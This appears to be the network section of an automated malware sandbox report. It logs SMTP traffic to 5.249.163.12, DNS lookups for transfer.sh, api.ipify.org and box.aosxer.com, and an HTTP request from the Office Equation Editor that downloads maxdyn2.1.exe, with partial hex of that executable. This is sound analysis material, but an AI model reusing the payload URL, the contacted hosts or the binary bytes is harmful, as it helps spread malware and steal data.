                                  Jan 18, 2023 09:14:45.440201998 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.440325975 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.440325975 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.440365076 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.481925964 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.481992006 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482029915 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482065916 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482101917 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482136965 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482198000 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482234955 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482269049 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482302904 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482336998 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482369900 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482403040 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482438087 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482472897 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.482659101 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.495009899 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.495068073 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.495093107 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.495115042 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.495434999 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.530966997 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531013966 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531045914 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531085968 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531110048 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531133890 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531162977 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531182051 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531210899 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531229973 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531248093 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531270981 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531295061 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531312943 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531332016 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.531374931 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539150000 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539182901 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539215088 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539233923 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539263964 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539292097 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539309025 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.539325953 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.542951107 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.543006897 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.543034077 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.543082952 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.543107986 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.543131113 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.543173075 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.543173075 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.543272972 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.543272972 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.546597958 CET49178587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.550050974 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550131083 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550175905 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550225019 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550259113 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.550259113 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.550283909 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550323009 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550344944 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.550349951 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550389051 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550393105 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.550420046 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.550429106 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550465107 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550491095 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550514936 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550538063 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550563097 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550682068 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550764084 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550796986 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550820112 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.550843000 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.592538118 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.592580080 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605424881 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605550051 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605618954 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605765104 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605798006 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605832100 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605865955 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605901957 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605937004 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.605969906 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606003046 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606036901 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606070042 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606103897 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606136084 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606169939 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606204987 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606237888 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606271029 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.606307030 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653168917 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653232098 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653253078 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653287888 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653321981 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653392076 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653426886 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653460979 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653495073 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653529882 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.653563976 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660456896 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660525084 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660592079 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660629034 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660737038 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660773039 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660825968 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660892963 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660944939 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.660978079 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661012888 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661046982 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661078930 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661113977 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661145926 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661179066 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.661443949 CET49179587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:45.704210997 CET587491785.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.771332026 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.820247889 CET587491795.249.163.12192.168.2.22
                                  Jan 18, 2023 09:14:45.923527956 CET49178587192.168.2.225.249.163.12
                                  Jan 18, 2023 09:14:46.032838106 CET49179587192.168.2.225.249.163.12

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 18, 2023 09:13:37.146893978 CET5586853192.168.2.228.8.8.8
                                  Jan 18, 2023 09:13:37.166675091 CET53558688.8.8.8192.168.2.22
                                  Jan 18, 2023 09:13:50.304089069 CET4968853192.168.2.228.8.8.8
                                  Jan 18, 2023 09:13:50.320935965 CET53496888.8.8.8192.168.2.22
                                  Jan 18, 2023 09:13:50.332366943 CET5883653192.168.2.228.8.8.8
                                  Jan 18, 2023 09:13:50.349430084 CET53588368.8.8.8192.168.2.22
                                  Jan 18, 2023 09:14:09.471867085 CET5013453192.168.2.228.8.8.8
                                  Jan 18, 2023 09:14:09.493438005 CET53501348.8.8.8192.168.2.22
                                  Jan 18, 2023 09:14:09.494229078 CET5013453192.168.2.228.8.8.8
                                  Jan 18, 2023 09:14:09.498119116 CET5527553192.168.2.228.8.8.8
                                  Jan 18, 2023 09:14:09.511863947 CET53501348.8.8.8192.168.2.22
                                  Jan 18, 2023 09:14:09.545176983 CET53552758.8.8.8192.168.2.22
                                  Jan 18, 2023 09:14:43.800529003 CET5991553192.168.2.228.8.8.8
                                  Jan 18, 2023 09:14:43.820194006 CET53599158.8.8.8192.168.2.22
                                  Jan 18, 2023 09:14:43.820513010 CET5991553192.168.2.228.8.8.8
                                  Jan 18, 2023 09:14:43.841638088 CET53599158.8.8.8192.168.2.22
                                  Jan 18, 2023 09:14:43.842207909 CET5991553192.168.2.228.8.8.8
                                  Jan 18, 2023 09:14:43.862047911 CET53599158.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 18, 2023 09:13:37.146893978 CET192.168.2.228.8.8.80x1fedStandard query (0)transfer.shA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.304089069 CET192.168.2.228.8.8.80xf7d9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.332366943 CET192.168.2.228.8.8.80xbb97Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:09.471867085 CET192.168.2.228.8.8.80x1f14Standard query (0)box.aosxer.comA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:09.494229078 CET192.168.2.228.8.8.80x1f14Standard query (0)box.aosxer.comA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:09.498119116 CET192.168.2.228.8.8.80xaee8Standard query (0)box.aosxer.comA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:43.800529003 CET192.168.2.228.8.8.80x2aafStandard query (0)box.aosxer.comA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:43.820513010 CET192.168.2.228.8.8.80x2aafStandard query (0)box.aosxer.comA (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:43.842207909 CET192.168.2.228.8.8.80x2aafStandard query (0)box.aosxer.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 18, 2023 09:13:37.166675091 CET8.8.8.8192.168.2.220x1fedNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.320935965 CET8.8.8.8192.168.2.220xf7d9No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.320935965 CET8.8.8.8192.168.2.220xf7d9No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.320935965 CET8.8.8.8192.168.2.220xf7d9No error (0)api4.ipify.org173.231.16.75A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.320935965 CET8.8.8.8192.168.2.220xf7d9No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.349430084 CET8.8.8.8192.168.2.220xbb97No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.349430084 CET8.8.8.8192.168.2.220xbb97No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.349430084 CET8.8.8.8192.168.2.220xbb97No error (0)api4.ipify.org173.231.16.75A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:13:50.349430084 CET8.8.8.8192.168.2.220xbb97No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:09.493438005 CET8.8.8.8192.168.2.220x1f14No error (0)box.aosxer.com5.249.163.12A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:09.511863947 CET8.8.8.8192.168.2.220x1f14No error (0)box.aosxer.com5.249.163.12A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:09.545176983 CET8.8.8.8192.168.2.220xaee8No error (0)box.aosxer.com5.249.163.12A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:43.820194006 CET8.8.8.8192.168.2.220x2aafNo error (0)box.aosxer.com5.249.163.12A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:43.841638088 CET8.8.8.8192.168.2.220x2aafNo error (0)box.aosxer.com5.249.163.12A (IP address)IN (0x0001)false
                                  Jan 18, 2023 09:14:43.862047911 CET8.8.8.8192.168.2.220x2aafNo error (0)box.aosxer.com5.249.163.12A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • transfer.sh
                                  • api.ipify.org

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249174144.76.136.153443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.224917564.185.227.155443C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249173144.76.136.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampkBytes transferredDirectionData
                                  Jan 18, 2023 09:13:37.285243988 CET0OUTGET /get/I9BcJI/maxdyn2.1.exe HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: transfer.sh
                                  Connection: Keep-Alive
                                  Jan 18, 2023 09:13:37.385618925 CET1INHTTP/1.1 301 Moved Permanently
                                  Server: nginx/1.18.0
                                  Date: Wed, 18 Jan 2023 08:13:37 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: keep-alive
                                  Location: https://transfer.sh/get/I9BcJI/maxdyn2.1.exe
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249174144.76.136.153443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampkBytes transferredDirectionData
                                  2023-01-18 08:13:38 UTC0OUTGET /get/I9BcJI/maxdyn2.1.exe HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Connection: Keep-Alive
                                  Host: transfer.sh
                                  2023-01-18 08:13:39 UTC0INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Wed, 18 Jan 2023 08:13:39 GMT
                                  Content-Type: application/x-ms-dos-executable
                                  Content-Length: 437857
                                  Connection: close
                                  Cache-Control: no-store
                                  Content-Disposition: attachment; filename="maxdyn2.1.exe"
                                  Retry-After: Wed, 18 Jan 2023 09:13:42 GMT
                                  X-Made-With: <3 by DutchCoders
                                  X-Ratelimit-Key: 127.0.0.1,84.17.52.5,84.17.52.5
                                  X-Ratelimit-Limit: 10
                                  X-Ratelimit-Rate: 600
                                  X-Ratelimit-Remaining: 9
                                  X-Ratelimit-Reset: 1674029622
                                  X-Remaining-Days: n/a
                                  X-Remaining-Downloads: n/a
                                  X-Served-By: Proudly served by DutchCoders
                                  Strict-Transport-Security: max-age=63072000
                                  2023-01-18 08:13:39 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELOah*
                                  2023-01-18 08:13:40 UTC16INData Raw: e8 9a 00 00 00 68 00 7f 00 00 53 ff d7 50 ff 15 f0 81 40 00 8b 7d 14 81 7f 08 00 07 00 00 75 48 81 7f 0c 00 01 00 00 75 3f 83 7f 10 0d 75 10 53 6a 01 68 11 01 00 00 ff 35 68 a2 42 00 ff d6 83 7f 10 1b 75 0c 53 53 6a 10 ff 35 68 a2 42 00 ff d6 33 c0 40 eb 1e 81 7d 0c 0b 04 00 00 75 06 ff 05 14 17 42 00 8b 7d 14 57 ff 75 10 ff 75 0c e8 24 fc ff ff 5f 5e 5b c9 c2 10 00 83 3d ec a2 42 00 00 a1 10 17 42 00 75 05 a1 44 37 42 00 6a 01 6a 01 68 f4 00 00 00 50 ff 15 80 82 40 00 c3 55 8b ec 83 ec 3c 8b 45 08 83 65 d8 00 83 65 dc 00 89 45 cc 8b 45 0c c7 45 c8 00 05 00 00 89 45 d4 8d 45 c4 50 c7 45 e0 01 00 00 00 c7 45 d0 c8 a3 40 00 e8 24 12 00 00 c9 c2 0c 00 55 8b ec 81 7d 0c 10 01 00 00 56 8b 75 14 75 26 ff 76 30 6a 1d ff 75 08 e8 39 fb ff ff 8b 46 3c c1 e0 0b 05
                                  Data Ascii: hSP@}uHu?uSjh5hBuSSj5hB3@}uB}Wuu$_^[=BBuD7BjjhP@U<EeeEEEEEPEE@$U}Vuu&v0ju9F<
                                  2023-01-18 08:13:40 UTC32INData Raw: 63 65 73 73 00 46 00 43 6f 70 79 46 69 6c 65 57 00 14 03 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 f4 01 47 65 74 57 69 6e 64 6f 77 73 44 69 72 65 63 74 6f 72 79 57 00 00 d6 01 47 65 74 54 65 6d 70 50 61 74 68 57 00 00 11 01 47 65 74 43 6f 6d 6d 61 6e 64 4c 69 6e 65 57 00 ea 01 47 65 74 56 65 72 73 69 6f 6e 45 78 57 00 15 03 53 65 74 45 72 72 6f 72 4d 6f 64 65 00 00 cd 03 6c 73 74 72 6c 65 6e 57 00 00 ca 03 6c 73 74 72 63 70 79 6e 57 00 94 03 57 69 64 65 43 68 61 72 54 6f 4d 75 6c 74 69 42 79 74 65 00 50 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 57 00 0a 02 47 6c 6f 62 61 6c 55 6e 6c 6f 63 6b 00 00 03 02 47 6c 6f 62 61 6c 4c 6f 63 6b 00 00 6f 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 71 01 47 65 74 4c 61 73 74 45
                                  Data Ascii: cessFCopyFileWSetEnvironmentVariableWGetWindowsDirectoryWGetTempPathWGetCommandLineWGetVersionExWSetErrorModelstrlenWlstrcpynWWideCharToMultiBytePGetDiskFreeSpaceWGlobalUnlockGlobalLockoCreateThreadqGetLastE
                                  2023-01-18 08:13:40 UTC48INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii:
                                  2023-01-18 08:13:40 UTC64INData Raw: ff 00 a8 b5 ff 00 a7 b4 ff 00 a6 b3 ff 00 a5 b1 ff 00 a4 b0 ff 00 a3 af ff 00 a2 ae ff 00 92 9c ff 00 26 29 ff 00 9f ab ff 00 9e aa ff 00 9d a9 ff 00 9c a7 ff 00 43 47 ff 00 7b 83 ff 00 64 6b ff 00 09 0a ff 00 67 6f ff 00 8e 97 ff 00 6e 75 ff 00 5b 61 ff 00 23 25 ff 00 4a 4f ff 00 70 78 ff 00 91 9a ff 00 87 8f ff 00 16 18 ff 00 26 28 ff 00 8c 95 ff 00 8f 98 ff 00 90 99 ff 00 8d 96 ff 00 1b 1c ff 00 21 23 ff 00 95 9f ff 00 97 a1 ff 00 98 a2 ff 00 99 a4 ff 00 92 9c ff 00 27 2a ff 00 1b 1d ff 00 96 a0 ff 00 a0 ab ff 00 a1 ac ff 00 a2 ae ff 00 a4 af ff 00 a5 b1 ff 00 a6 b2 ff 00 a8 b3 ff 00 a9 b5 ff 00 aa b6 ff 00 ac b8 ff 00 ad b9 ff 00 ae bb ff 00 b0 bc ff 00 b1 be ff 00 b2 bf ff 00 b4 c1 ff 00 b5 c2 ff 00 b6 c3 ff 00 b8 c5 ff 00 b9 c6 ff 00 ba c8 ff 00 bb
                                  Data Ascii: &)CG{dkgonu[a#%JOpx&(!#'*
                                  2023-01-18 08:13:40 UTC80INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 83 0b 00 7d 84 5e 00 7e 85 bf 00 80 87 fe 00 82 8a ff 00 84 8c ff 00 86 8f ff 00 88 91 ff 00 8b 94 ff 00 8d 96 ff 00 8f 98 ff 00 91 9a ff 00 93 9c ff 00 95 9f ff 00 97 a1 ff 00 99 a3 ff 00 9a a5 ff 00 9c a7 ff 00 9e a9 ff 00 a0 ab ff 00 a2 ad ff 00 a3 af ff 25 a2 b4 ff 31 a1 b6 ff 1c 5b 67 ff 00 00 00 ff 00 00 00 ff 00 00
                                  Data Ascii: |}^~%1[g
